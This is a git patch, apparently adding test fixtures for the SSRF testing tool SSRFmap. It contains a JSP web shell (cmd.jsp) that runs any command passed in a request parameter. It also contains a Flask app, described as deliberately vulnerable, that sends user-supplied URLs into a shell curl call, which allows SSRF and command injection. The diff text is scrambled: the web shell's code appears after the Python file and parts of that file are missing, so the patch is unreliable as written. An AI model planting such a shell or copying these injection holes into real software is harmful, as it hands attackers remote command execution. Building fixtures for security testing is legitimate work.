From 49ab156d022341bd2166690b0cd9a16648038f46 Mon Sep 17 00:00:00 2001 From: Error <110461609+errorfiathck@users.noreply.github.com> Date: Tue, 14 Nov 2023 17:29:42 +0330 Subject: [PATCH] Add files via upload --- data/cmd.jsp | 23 +++++++++++++++++++ data/example.py | 58 +++++++++++++++++++++++++++++++++++++++++++++++ data/request.txt | 13 +++++++++++ data/request2.txt | 13 +++++++++++ data/request3.txt | 9 ++++++++ data/request4.txt | 9 ++++++++ data/request5.txt | 16 +++++++++++++ 7 files changed, 141 insertions(+) create mode 100644 data/cmd.jsp create mode 100644 data/example.py create mode 100644 data/request.txt create mode 100644 data/request2.txt create mode 100644 data/request3.txt create mode 100644 data/request4.txt create mode 100644 data/request5.txt diff --git a/data/cmd.jsp b/data/cmd.jsp new file mode 100644 index 0000000..a7d2bb7 --- /dev/null +++ b/data/cmd.jsp @@ -0,0 +1,23 @@ +<%@ page import="java.util.*,java.io.*"%> +
+ ++<% +if (request.getParameter("cmd") != null) { + out.println("Command: " + request.getParameter("cmd") + "+ \ No newline at end of file diff --git a/data/example.py b/data/example.py new file mode 100644 index 0000000..ddacbba --- /dev/null +++ b/data/example.py @@ -0,0 +1,58 @@ +# NOTE: do not try this at home - highly vulnerable ! (SSRF and RCE) +# NOTE: this file should become a simple ssrf example in order to test SSRFmap +# FLASK_APP=example.py flask run + +from flask import Flask, abort, request +import json +import re +import subprocess + +app = Flask(__name__) + +@app.route("/") +def hello(): + return "SSRF Example!" + +# curl -i -X POST -d 'url=http://example.com' http://localhost:5000/ssrf +@app.route("/ssrf", methods=['POST']) +def ssrf(): + data = request.values + content = command(f"curl {data.get('url')}") + return content + +# curl -i -H "Content-Type: application/json" -X POST -d '{"url": "http://example.com"}' http://localhost:5000/ssrf2 +@app.route("/ssrf2", methods=['POST']) +def ssrf2(): + data = request.json + print(data) + print(data.get('url')) + content = command(f"curl {data.get('url')}") + return content + +# curl -v "http://127.0.0.1:5000/ssrf3?url=http://example.com" +@app.route("/ssrf3", methods=['GET']) +def ssrf3(): + data = request.values + content = command(f"curl {data.get('url')}") + return content + +# curl -X POST -H "Content-Type: application/xml" -d '
"); + Process p = Runtime.getRuntime().exec(request.getParameter("cmd")); + OutputStream os = p.getOutputStream(); + InputStream in = p.getInputStream(); + DataInputStream dis = new DataInputStream(in); + String disr = dis.readLine(); + while ( disr != null ) { + out.println(disr); + disr = dis.readLine(); + } + } +%> +